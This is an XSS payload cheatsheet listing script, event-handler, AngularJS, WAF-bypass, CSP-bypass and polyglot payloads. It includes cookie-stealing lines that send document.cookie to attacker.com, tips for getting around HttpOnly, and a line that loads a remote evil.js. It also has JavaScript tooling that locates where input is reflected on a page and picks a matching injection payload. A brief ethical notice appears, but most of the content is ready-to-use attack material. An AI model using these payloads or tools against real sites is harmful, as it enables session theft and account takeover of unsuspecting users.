🛡️ XSS Payloads Cheatsheet

⚠️ Ethical Notice: These payloads should only be used on systems you have permission to test!

1. Basic Reflection Payloads

<script>alert(1)</script>
<script>alert("hacked by rakshak")</script>
<u>hello</u>  // Test for HTML parsing

2. Image Tag Payloads

<img src=1 onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<img src=1 onerror=print()>
<img src=1 onerror=alert(1) style=display:none>

3. JavaScript Context Payloads

'; alert(1); var x='
</script><script>alert(1)</script>//
'\</script><script>alert(1)</script>//
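As an added example that is not part of the original cheatsheet: a Node script showing why the two JavaScript-context payloads above escape an inline script, next to the safe way to embed user data in a `<script>` block. The page template and the variable name `search` are assumptions made for the demo.

```javascript
// Added example, not from the original cheatsheet: why the JS-context
// payloads break out of an inline <script>, and a safe template for comparison.
// The template and the variable name "search" are assumptions for the demo.

// Vulnerable: user input is pasted straight into a JS string literal.
function renderVulnerable(userInput) {
  return `<script>var search='${userInput}';</script>`;
}

// Safe: JSON.stringify handles quotes and backslashes; on top of that every
// character the HTML parser cares about (< > & /) and the JS line terminators
// U+2028/U+2029 are written as \uXXXX escapes, so the literal can never
// contain "</script" or open a new tag.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\/\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderSafe(userInput) {
  return `<script>var search=${jsStringLiteral(userInput)};</script>`;
}

// Mimics the browser: the HTML parser cuts each script block at the first
// "</script" it sees, regardless of JS quoting, then runs each block in turn.
// A block that fails to parse is skipped and later blocks still run.
// alert() is replaced by a recorder so the result can be inspected.
function simulateBrowser(html) {
  const fired = [];
  const block = /<script>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = block.exec(html)) !== null) {
    try {
      new Function('alert', m[1])(v => fired.push(v));
    } catch (e) {
      // SyntaxError or runtime error: the browser logs it and moves on
    }
  }
  return fired;
}

// The two payloads from the JavaScript Context section above.
const PAYLOADS = [
  "'; alert(1); var x='",
  "</script><script>alert(1)</script>//",
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const p of PAYLOADS) {
    console.log('vulnerable:', simulateBrowser(renderVulnerable(p)));
    console.log('safe:      ', simulateBrowser(renderSafe(p)));
  }
}
```

The first payload closes the string, runs `alert(1)` and reopens a string so the rest of the statement still parses; the second never touches JS syntax at all, because the HTML parser ends the script block at `</script>` before the JS engine sees it, which is why backslash-escaping quotes is not a fix and why the safe template escapes `<`, `>` and `/` as `\uXXXX`.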

4. AngularJS Payloads

{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{{}[{toString:[].join,length:1,0:'__proto__'}].toString.$apply()}}

5. WAF Bypass Payloads

<body onresize=print()>
<custom onmouseover=alert(1)>
<svg><animatetransform onbegin=alert(1) attributeName=transform>
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](1)  // decodes to "onmouseover=window['al'+'er'+(['t','b','c'][0])](1); the trailing (1) is what actually calls alert

6. Event Handler Payloads

" onclick=alert(1) a="
" onerror=alert(1) x="
" onmouseover=alert(1) "
" onfocus=alert(1) autofocus "
" onresize=print() "

7. iframe-Based Payloads

<iframe src="javascript:alert(1)">
<iframe src="https://victim.com/#" onload="this.src+='<img src=x onerror=alert(1)>'">
<iframe srcdoc="<script>alert(1)</script>">

8. Cookie Stealing Payloads

<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
<script>navigator.sendBeacon('https://attacker.com/log', document.cookie)</script>
<img src=x onerror="fetch('https://attacker.com/?'+document.cookie)">
// document.cookie never includes cookies set with the HttpOnly flag; if the session cookie has it, drive the victim's session from inside the page (fetch() with credentials) instead of exfiltrating the cookie
// run document.cookie through encodeURIComponent() before appending it to a query string so the logging server receives it intact however it splits the query

9. DOM-Based Payloads

javascript:alert(1)  // for sinks that end up in location, href or src
data:text/html,<script>alert(1)</script>  // Chrome blocks top-level navigation to data: URLs; still works as an iframe/object src
<svg><set onload=alert(1)>
<details open ontoggle=alert(1)>

10. Remote Script Loading and Legacy Element Payloads

javascript:eval('var a=document.createElement(\'script\');a.src=\'https://attacker.com/evil.js\';document.body.appendChild(a)')
<link rel="import" href="javascript:alert(1)">  // HTML Imports were removed from Chrome in version 80 and never shipped in Firefox; legacy browsers only
<embed src="javascript:alert(1)">

11. Polyglot Payloads

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
'">><marquee><img src=x onerror=confirm(1)></marquee>

12. CSP Bypass Payloads

<script nonce=PREDICTED_NONCE>alert(1)</script>  // only if the nonce is static, reused across responses, or otherwise guessable
<base href="javascript:/"><a href="/*alert(1)">click
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">  // base64 of <script>alert(1)</script>; needs object-src (or default-src) to allow data:

🔥 Tips for Using These Payloads:

  1. URL-encode payloads that travel in a query string or form body, and check what the server decodes
  2. Identify the injection context first (HTML text, attribute value, JavaScript string, URL) and pick the payload family for it
  3. Combine payloads, e.g. a context break-out followed by an event handler
  4. Use Burp Suite (Intruder/Repeater) to automate testing
  5. Keep track of which payloads work in which scenarios
  6. Consider browser-specific payloads
  7. Test different encodings (URL, HTML entity, JavaScript \u escapes) against the same sink
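Tips 1, 2 and 7 are one workflow: reflect a harmless canary, work out where it lands, then send the payload family that fits. The following is an added example, not part of the original cheatsheet, that classifies each reflection of a canary in a response body and maps it to a payload from the sections above; the response below is constructed for the demo (run the classifier on a real HTTP body instead), and the canary value and function names are assumptions.

```javascript
// Added example, not from the original cheatsheet: classify where a reflected
// canary lands and pick a payload family from the sections above for it.
// SAMPLE_RESPONSE is a constructed page; the canary and names are assumptions.

const CANARY = 'zx7q9k';  // alphanumeric so no filter mangles it

// Constructed response that reflects the canary in three different contexts.
const SAMPLE_RESPONSE = `<html><body>
<h1>Results for ${CANARY}</h1>
<input name="q" value="${CANARY}">
<script>var query = '${CANARY}'; track(query);</script>
</body></html>`;

// Quote character still open at the end of a JS fragment, or null.
// Backslash escapes are honoured so an escaped quote does not close a string.
function openQuote(js) {
  let q = null;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    if (q) {
      if (c === '\\') i++;
      else if (c === q) q = null;
    } else if (c === '"' || c === "'" || c === '`') {
      q = c;
    }
  }
  return q;
}

// Context of a single reflection that starts at offset pos.
function contextAt(html, pos) {
  const before = html.slice(0, pos);
  const lower = before.toLowerCase();
  const scriptOpen = lower.lastIndexOf('<script');
  if (scriptOpen > lower.lastIndexOf('</script')) {
    const body = before.slice(before.indexOf('>', scriptOpen) + 1);
    const q = openQuote(body);
    return q ? { context: 'js-string', quote: q } : { context: 'js-code' };
  }
  if (lower.lastIndexOf('<!--') > lower.lastIndexOf('-->')) {
    return { context: 'html-comment' };
  }
  const tagOpen = before.lastIndexOf('<');
  if (tagOpen > before.lastIndexOf('>')) {
    // Inside a tag: is the canary an attribute value, and how is it quoted?
    const attr = /([\w-]+)\s*=\s*(["']?)[^"'>]*$/.exec(before.slice(tagOpen));
    if (attr) return { context: 'attribute', name: attr[1], quote: attr[2] || null };
    return { context: 'tag' };
  }
  return { context: 'html-text' };
}

function classifyReflections(html, canary) {
  const found = [];
  for (let i = html.indexOf(canary); i !== -1; i = html.indexOf(canary, i + canary.length)) {
    found.push(contextAt(html, i));
  }
  return found;
}

// Payload from the cheatsheet for each context; urlEncoded is the form that
// goes into the query string (tip 1).
function suggestPayload(ctx) {
  const q = ctx.quote || '';
  let p;
  switch (ctx.context) {
    case 'html-text':    p = '<img src=1 onerror=alert(1)>'; break;
    case 'html-comment': p = '--><img src=1 onerror=alert(1)>'; break;  // close the comment first
    case 'attribute':    p = `${q} onfocus=alert(1) autofocus ${q}`; break;
    case 'tag':          p = ' onfocus=alert(1) autofocus '; break;
    case 'js-string':    p = `${q}; alert(1); var x=${q}`; break;
    default:             p = '</script><script>alert(1)</script>//';  // works in any script block
  }
  return { raw: p, urlEncoded: encodeURIComponent(p) };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const ctx of classifyReflections(SAMPLE_RESPONSE, CANARY)) {
    console.log(ctx, '=>', suggestPayload(ctx));
  }
}
```

The classifier is deliberately simple (no full HTML tokenizer), which is enough to tell the three common cases apart; the attribute branch also reports the quote character, because a double-quoted value needs the `" onfocus=...` form while an unquoted one only needs a space, and the js-string branch reuses the quote it found so the break-out payload reopens a string of the same kind.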